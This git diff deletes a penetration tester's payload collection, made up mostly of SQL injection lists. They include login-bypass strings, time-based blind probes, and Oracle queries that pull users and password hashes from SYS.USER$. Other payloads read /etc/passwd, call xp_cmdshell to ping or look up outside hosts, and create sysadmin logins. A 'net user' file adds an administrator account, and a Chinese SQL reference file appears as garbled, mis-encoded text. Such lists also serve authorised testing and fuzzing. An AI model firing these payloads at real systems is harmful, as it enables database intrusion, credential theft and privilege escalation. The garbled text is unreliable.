diff --git a/payloads/README.MD b/payloads/README.MD deleted file mode 100644 index 19cfa34..0000000 --- a/payloads/README.MD +++ /dev/null @@ -1,3 +0,0 @@ -# those are some useful payloads collected by me when on penetration test -# here are two directions including sqli and xss -# in each direction, there are some payloads diff --git a/payloads/SQLi/admin''.txt b/payloads/SQLi/admin''.txt deleted file mode 100644 index 7f30bbf..0000000 --- a/payloads/SQLi/admin''.txt +++ /dev/null @@ -1,77 +0,0 @@ -'-' -' ' -'&' -'^' -'*' -' or ''-' -' or '' ' -' or ''&' -' or ''^' -' or ''*' -"-" -" " -"&" -"^" -"*" -" or ""-" -" or "" " -" or ""&" -" or ""^" -" or ""*" -or true-- -" or true-- -' or true-- -") or true-- -') or true-- -' or 'x'='x -') or ('x')=('x -')) or (('x'))=(('x -" or "x"="x -") or ("x")=("x -")) or (("x"))=(("x -or 1=1 -or 1=1-- -or 1=1# -or 1=1/* -admin' -- -admin' # -admin'/* -admin' or '1'='1 -admin' or '1'='1'-- -admin' or '1'='1'# -admin' or '1'='1'/* -admin'or 1=1 or ''=' -admin' or 1=1 -admin' or 1=1-- -admin' or 1=1# -admin' or 1=1/* -admin') or ('1'='1 -admin') or ('1'='1'-- -admin') or ('1'='1'# -admin') or ('1'='1'/* -admin') or '1'='1 -admin') or '1'='1'-- -admin') or '1'='1'# -admin') or '1'='1'/* -1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 -admin" -- -admin" # -admin"/* -admin" or "1"="1 -admin" or "1"="1"-- -admin" or "1"="1"# -admin" or "1"="1"/* -admin"or 1=1 or ""=" -admin" or 1=1 -admin" or 1=1-- -admin" or 1=1# -admin" or 1=1/* -admin") or ("1"="1 -admin") or ("1"="1"-- -admin") or ("1"="1"# -admin") or ("1"="1"/* -admin") or "1"="1 -admin") or "1"="1"-- -admin") or "1"="1"# -admin") or "1"="1"/* -1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 diff --git a/payloads/SQLi/sqli-detect.txt b/payloads/SQLi/sqli-detect.txt deleted file mode 100644 index f06d621..0000000 --- a/payloads/SQLi/sqli-detect.txt +++ /dev/null 
@@ -1,142 +0,0 @@ -'sqlvuln -'+sqlvuln -sqlvuln; -(sqlvuln) -a' or 1=1-- -"a"" or 1=1--" - or a = a -a' or 'a' = 'a -1 or 1=1 -a' waitfor delay '0:0:10'-- -1 waitfor delay '0:0:10'-- -declare @q nvarchar (4000) select @q = -0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A -0 -031003000270000 -declare @s varchar(22) select @s = -0x77616974666F722064656C61792027303A303A31302700 exec(@s) -0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e -exec(@s) -a' -? -' or 1=1 -‘ or 1=1 -- -x' AND userid IS NULL; -- -x' AND email IS NULL; -- -anything' OR 'x'='x -x' AND 1=(SELECT COUNT(*) FROM tabname); -- -x' AND members.email IS NULL; -- -x' OR full_name LIKE '%Bob% -23 OR 1=1 -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -' -'%20or%20''=' -'%20or%20'x'='x -%20or%20x=x -')%20or%20('x'='x -0 or 1=1 -' or 0=0 -- -" or 0=0 -- -or 0=0 -- -' or 0=0 # - or 0=0 #" -or 0=0 # -' or 1=1-- -" or 1=1-- -' or '1'='1'-- -' or 1 --' -or 1=1-- -or%201=1 -or%201=1 -- -' or 1=1 or ''=' - or 1=1 or ""= -' or a=a-- - or a=a -') or ('a'='a -) or (a=a -hi or a=a -hi or 1=1 --" -hi' or 1=1 -- -hi' or 'a'='a -hi') or ('a'='a -"hi"") or (""a""=""a" -'hi' or 'x'='x'; -@variable -,@variable -PRINT -PRINT @@variable -select -insert -as -or -procedure -limit -order by -asc -desc -delete -update -distinct -having -truncate -replace -like -handler -bfilename -' or username like '% -' or uname like '% -' or userid like '% -' or uid like '% -' or user like '% -exec xp -exec sp -'; exec master..xp_cmdshell -'; exec xp_regread -t'exec master..xp_cmdshell 'nslookup www.google.com'-- ---sp_password -\x27UNION SELECT -' UNION SELECT -' UNION ALL SELECT -' or (EXISTS) -' (select top 1 -'||UTL_HTTP.REQUEST -1;SELECT%20* -to_timestamp_tz -tz_offset -<>"'%;)(&+ -'%20or%201=1 -%27%20or%201=1 -%20$(sleep%2050) -%20'sleep%2050' -char%4039%41%2b%40SELECT -'%20OR -'sqlattempt1 -(sqlattempt2) -| 
-%7C -*| -%2A%7C -*(|(mail=*)) -%2A%28%7C%28mail%3D%2A%29%29 -*(|(objectclass=*)) -%2A%28%7C%28objectclass%3D%2A%29%29 -( -%28 -) -%29 -& -%26 -! -%21 -' or 1=1 or ''=' -' or ''=' -x' or 1=1 or 'x'='y -/ -// -//* -*/* -a' or 3=3-- -"a"" or 3=3--" -' or 3=3 -‘ or 3=3 -- diff --git a/payloads/SQLi/sqli-jbrofuzz.txt b/payloads/SQLi/sqli-jbrofuzz.txt deleted file mode 100644 index 27870aa..0000000 --- a/payloads/SQLi/sqli-jbrofuzz.txt +++ /dev/null 
@@ -1,167 +0,0 @@ -a -a' -a' -- -a' or 1=1; -- -@ -? -' and 1=0) union all -? or 1=1 -- -x' and userid is NULL; -- -x' and email is NULL; -- -anything' or 'x'='x -x' and 1=(select count(*) from tabname); -- -x' and members.email is NULL; -- -x' or full_name like '%bob% -23 or 1=1; -- -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -a -1 or 1=1 -1' or '1'='1 -1 and user_name() = 'dbo' -1 -1'1 -1 exec sp_ (or exec xp_) -1 and 1=1 -1' and 1=(select count(*) from tablenames); -- -1 -1 and user_name() = 'dbo' -\'; desc users; -- -1\'1 -1' and non_existant_table = '1 -' or username is not NULL or username = ' -1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 -1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- -1 uni/**/on select all from where -’ or ‘1’=’1 -' or '1'='1 -'||utl_http.request('httP://192.168.1.1/')||' -' || myappadmin.adduser('admin', 'newpass') || ' -' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) 
FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT 
DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i -' AND 
1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM 
SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i -'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) -||6 -'||'6 -(||6) -' or 1=1-- -or 1=1 -' or '1'='1 -; or '1'='1' -" or isNULL(1/0) /* -' or '7659'='7659 -" or isNULL(1/0) /* -' -- -' or 1=1-- -" or 1=1-- -' or 1=1 /* -or 1=1-- -' or 'a'='a -" or "a"="a -') or ('a'='a -admin' or ' -' select * from information_schema.tables-- -) union select * from information_schema.tables; -' having 1=1-- -' having 1=1-- -' group by userid having 1=1-- -' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- -' or 1 in (select @@version)-- -' union all select @@version-- -' or 'unusual' = 'unusual' -' or 'something' = 'some'+'thing' -' or 'text' = n'text' -' or 'something' like 'some%' -' or 2 > 1 -' or 'text' > 't' -' or 'whatever' in ('whatever') -' or 2 between 1 and 3 -' or username like char(37); -' union select * from users where login = char(114,111,111,116); -' union select -password:*/=1-- -uni/**/on sel/**/ect -'; execute immediate 'sel' || 'ect us' || 'er' -'; exec ('sel' + 'ect us' + 'er') -'/**/or/**/1/**/=/**/1 -' or 1/* - or isNULL(1/0) /* -' or '7659'='7659 -" or isNULL(1/0) /* -' -- &password= -'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > -@var 
select @var as var into temp end -- -' and 1 in (select var from temp)-- -' union select 1,load_file('/etc/passwd'),1,1,1; -1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; -' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); -'; exec master..xp_cmdshell 'ping 10.10.1.2'-- -create user name identified by 'pass123' -create user name identified by pass123 temporary tablespace temp default tablespace users; -' ; drop table temp -- -exec sp_addlogin 'name' , 'password' -exec sp_addsrvrolemember 'name' , 'sysadmin' -insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -grant connect to name; grant resource to name; -insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) -' or 1=1 -- -' union (select @@version) -- -' union (select NULL, (select @@version)) -- -' union (select NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- -'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- -'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- -'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- \ No newline at end of file diff --git a/payloads/SQLi/sqli-owasp.txt b/payloads/SQLi/sqli-owasp.txt deleted file mode 100644 index 1b810e3..0000000 
--- a/payloads/SQLi/sqli-owasp.txt +++ /dev/null 
@@ -1,142 +0,0 @@ -'sqlvuln -'+sqlvuln -sqlvuln; -(sqlvuln) -a' or 1=1-- -"a"" or 1=1--" - or a = a -a' or 'a' = 'a -1 or 1=1 -a' waitfor delay '0:0:10'-- -1 waitfor delay '0:0:10'-- -declare @q nvarchar (4000) select @q = -0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A -0 -031003000270000 -declare @s varchar(22) select @s = -0x77616974666F722064656C61792027303A303A31302700 exec(@s) -0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e -exec(@s) -a' -? -' or 1=1 -‘ or 1=1 -- -x' AND userid IS NULL; -- -x' AND email IS NULL; -- -anything' OR 'x'='x -x' AND 1=(SELECT COUNT(*) FROM tabname); -- -x' AND members.email IS NULL; -- -x' OR full_name LIKE '%Bob% -23 OR 1=1 -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -' -'%20or%20''=' -'%20or%20'x'='x -%20or%20x=x -')%20or%20('x'='x -0 or 1=1 -' or 0=0 -- -" or 0=0 -- -or 0=0 -- -' or 0=0 # - or 0=0 #" -or 0=0 # -' or 1=1-- -" or 1=1-- -' or '1'='1'-- -' or 1 --' -or 1=1-- -or%201=1 -or%201=1 -- -' or 1=1 or ''=' - or 1=1 or ""= -' or a=a-- - or a=a -') or ('a'='a -) or (a=a -hi or a=a -hi or 1=1 --" -hi' or 1=1 -- -hi' or 'a'='a -hi') or ('a'='a -"hi"") or (""a""=""a" -'hi' or 'x'='x'; -@variable -,@variable -PRINT -PRINT @@variable -select -insert -as -or -procedure -limit -order by -asc -desc -delete -update -distinct -having -truncate -replace -like -handler -bfilename -' or username like '% -' or uname like '% -' or userid like '% -' or uid like '% -' or user like '% -exec xp -exec sp -'; exec master..xp_cmdshell -'; exec xp_regread -t'exec master..xp_cmdshell 'nslookup www.google.com'-- ---sp_password -\x27UNION SELECT -' UNION SELECT -' UNION ALL SELECT -' or (EXISTS) -' (select top 1 -'||UTL_HTTP.REQUEST -1;SELECT%20* -to_timestamp_tz -tz_offset -<>"'%;)(&+ -'%20or%201=1 -%27%20or%201=1 -%20$(sleep%2050) -%20'sleep%2050' -char%4039%41%2b%40SELECT -'%20OR -'sqlattempt1 -(sqlattempt2) -| 
-%7C -*| -%2A%7C -*(|(mail=*)) -%2A%28%7C%28mail%3D%2A%29%29 -*(|(objectclass=*)) -%2A%28%7C%28objectclass%3D%2A%29%29 -( -%28 -) -%29 -& -%26 -! -%21 -' or 1=1 or ''=' -' or ''=' -x' or 1=1 or 'x'='y -/ -// -//* -*/* -a' or 3=3-- -"a"" or 3=3--" -' or 3=3 -‘ or 3=3 -- \ No newline at end of file diff --git a/payloads/SQLi/sqlifuzzer.txt b/payloads/SQLi/sqlifuzzer.txt deleted file mode 100644 index 9b0e43a..0000000 --- a/payloads/SQLi/sqlifuzzer.txt +++ /dev/null 
@@ -1,86 +0,0 @@ -2 and 456=678 -2 or 345=345 -2 order by 9999 -2 order by 1 -2/0 and 456=678 -2/1 or 345=345 -2/*f*/and/*f*/456=678 -2/*f*/or/*f*/345=345 -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'-- # -a' or 'dfth'='dfth'-- # -a' order by 9999-- # -a' order by 1-- # -a'and/*g*/456=678-- # -a'or/*g*/345=345-- # -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'# -a' or 'dfth'='dfth'# -a' order by 9999# -a' order by 1# -a'||/**/456=678# -a'||/**/345=345# -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'-- -a' or 'dfth'='dfth'-- -a' order by 9999-- -a' order by 1-- -a'and/*d*/456=678-- -a'or/*d*/345=345-- -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'-- # -a' or 'dfth'='dfth'-- # -a' order by 9999-- # -a' order by 1-- # -a'and/*g*/456=678-- # -a'or/*g*/345=345-- # -345'%5d|//*|/a%5b'a -456'%5d|//a|/a%5b'a -345')%5d|//*|/a%5bcontains(a,'b -456')%5d|//a|/a%5bcontains(a,'b -a" and "456"="678 -a" or "345"="345 -a" and "fghi"="fghj"-- # -a" or "dfth"="dfth"-- # -a" order by 9999-- # -a" order by 1-- # -a"and/*g*/456=678-- # -a"or/*g*/345=345-- # -345"%5d|//*|/a%5b"a -456"%5d|//a|/a%5b"a -345")%5d|//*|/a%5bcontains(a,"b -456")%5d|//a|/a%5bcontains(a,"b -1 waitfor delay '0:0:X'-- -1; waitfor delay '0:0:X'-- -1'; waitfor delay '0:0:X'-- -1); waitfor delay '0:0:X'-- -1)); waitfor delay '0:0:X'-- -1'); waitfor delay '0:0:X'-- -1')); waitfor delay '0:0:X'-- -1 or benchmark(100000000,MD5(1))# -1' or benchmark(100000000,MD5(1))# -1) or benchmark(100000000,MD5(1))# -1') or benchmark(100000000,MD5(1))# -1)) or benchmark(100000000,MD5(1))# -1')) or benchmark(100000000,MD5(1))# -1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)-- -1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')-- -1 waitfor delay '0:0:X'-- -1; waitfor delay '0:0:X'-- -1'; waitfor delay '0:0:X'-- -1); waitfor delay '0:0:X'-- -1)); waitfor delay '0:0:X'-- -1'); waitfor delay '0:0:X'-- -1')); waitfor delay '0:0:X'-- -1 or benchmark(100000000,MD5(1))# 
-1' or benchmark(100000000,MD5(1))# -1) or benchmark(100000000,MD5(1))# -1') or benchmark(100000000,MD5(1))# -1)) or benchmark(100000000,MD5(1))# -1')) or benchmark(100000000,MD5(1))# -1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)-- -1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')-- diff --git a/payloads/SQLi/添加系统用户.txt b/payloads/SQLi/添加系统用户.txt deleted file mode 100644 index 17d9cb4..0000000 --- a/payloads/SQLi/添加系统用户.txt +++ /dev/null @@ -1,5 +0,0 @@ -net user #гϵͳѴڵû -net user root ym2011 /add #һû -net user administrators /add #ûȨԱ -net user #ȷѳɹû -net user root # ȷûȨ diff --git a/payloads/SQLi/经典SQL语句.txt b/payloads/SQLi/经典SQL语句.txt deleted file mode 100644 index 315f90e..0000000 --- a/payloads/SQLi/经典SQL语句.txt +++ /dev/null 
@@ -1,738 +0,0 @@ -һ - -1˵ݿ -CREATE DATABASE database-name -2˵ɾݿ -drop database dbname -3˵sql server ---- ݵ device -USE master -EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat' ---- ʼ -BACKUP DATABASE pubs TO testBack -4˵± -create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null],..) - -еı± -Acreate table tab_new like tab_old (ʹþɱ±) -Bcreate table tab_new as select col1,col2 from tab_old definition only -5˵ɾ± -drop table tabname -6˵һ -Alter table tabname add column col type -עӺ󽫲ɾDB2мϺҲܸı䣬Ψһܸıvarchar͵ijȡ -7˵ Alter table tabname add primary key(col) -˵ɾ Alter table tabname drop primary key(col) -8˵create [unique] index idxname on tabname(col.) -ɾdrop index idxname -עDzɸĵģıɾ½ -9˵ͼcreate view viewname as select statement -ɾͼdrop view viewname -10˵򵥵Ļsql -ѡselect * from table1 where Χ -룺insert into table1(field1,field2) values(value1,value2) -ɾdelete from table1 where Χ -£update table1 set field1=value1 where Χ -ңselect * from table1 where field1 like %value1% ---like﷨ܾ! 
-select * from table1 order by field1,field2 [desc] -select count as totalcount from table1 -ͣselect sum(field1) as sumvalue from table1 -ƽselect avg(field1) as avgvalue from table1 -select max(field1) as maxvalue from table1 -Сselect min(field1) as minvalue from table1 -11˵߼ѯ -A UNION -UNION ͨ TABLE1 TABLE2ȥκظжһ ALL UNION һʹʱ UNION ALLظС£ÿһв TABLE1 TABLE2 -B EXCEPT -EXCEPTͨ TABLE1 е TABLE2 евظжһ ALL EXCEPT һʹʱ (EXCEPT ALL)ظС -C INTERSECT -INTERSECTֻͨ TABLE1 TABLE2 жевظжһ ALL INTERSECT һʹʱ (INTERSECT ALL)ظС -עʹʵļѯбһµġ -12˵ʹ -Aleft outer join -ӣӣӱƥУҲӱС -SQL: select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c -Bright outer join: -()ȰӱƥУҲӱС -Cfull/cross outer join -ȫӣӱƥУӱем¼ -12:Group by: - һűһ ɺ󣬲ѯֻܵõصϢ - صϢͳϢ count,sum,max,min,avg ı׼) - SQLServerзʱtext,ntext,image͵ֶΪ - selecteͳƺеֶΣֶܺͨηһ - -13ݿв - ݿ⣺ sp_detach_db;ݿ⣺sp_attach_db ӱҪ· -14.޸ݿ: -sp_renamedb 'old_name', 'new_name' - - -1˵Ʊ(ֻƽṹ,Դa ±b) (Access) -һselect * into b from a where 1<>1SQlServer -select top 0 * into b from a -2˵(,Դa Ŀb) (Access) -insert into b(a, b, c) select d,e,f from b; - -3˵ݿ֮Ŀ(ʹþ·) (Access) -insert into b(a, b, c) select d,e,f from b in ݿ⡯ where -ӣ..from b in '"&Server.MapPath(".")&"\data.mdb" &"' where.. 
- -4˵Ӳѯ(1a 2b) -select a,b,c from a where a IN (select d from b ) : select a,b,c from a where a IN (1,2,3) - -5˵ʾ¡ύ˺ظʱ -select a.title,a.username,b.adddate from table a,(select max(adddate) adddate from table where table.title=a.title) b - -6˵Ӳѯ(1a 2b) -select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c - -7˵ͼѯ(1a ) -select * from (SELECT a,b,c FROM a) T where t.a > 1; - -8˵between÷,betweenƲѯݷΧʱ˱ֵ߽,not between -select * from table1 where time between time1 and time2 -select a,b,c, from table1 where a not between ֵ1 and ֵ2 - -9˵in ʹ÷ -select * from table1 where a [not] in (ֵ1,ֵ2,ֵ4,ֵ6) - -10˵ŹɾѾڸûеϢ -delete from table1 where not exists ( select * from table2 where table1.field1=table2.field1 ) - -11˵ı⣺ -select * from a left inner join b on a.a=b.b right inner join c on a.a=c.c inner join d on a.a=d.d where ..... - -12˵ճ̰ǰ -SQL: select * from ճ̰ where datediff('minute',fʼʱ,getdate())>5 - -13˵һsql 㶨ݿҳ -select top 10 b.* from (select top 20 ֶ,ֶ from order by ֶ desc) a, b where b.ֶ = a.ֶ order by a.ֶ -ʵ֣ -ݿҳ - - declare @start int,@end int - - @sql nvarchar(600) - - set @sql=select top+str(@end-@start+1)++from T where rid not in(select top+str(@str-1)+Rid from T where Rid>-1) - - exec sp_executesql @sql - - -ע⣺topֱӸһʵӦֻĽĴRidΪһʶУtopоֶΣǷdzкôġΪԱ 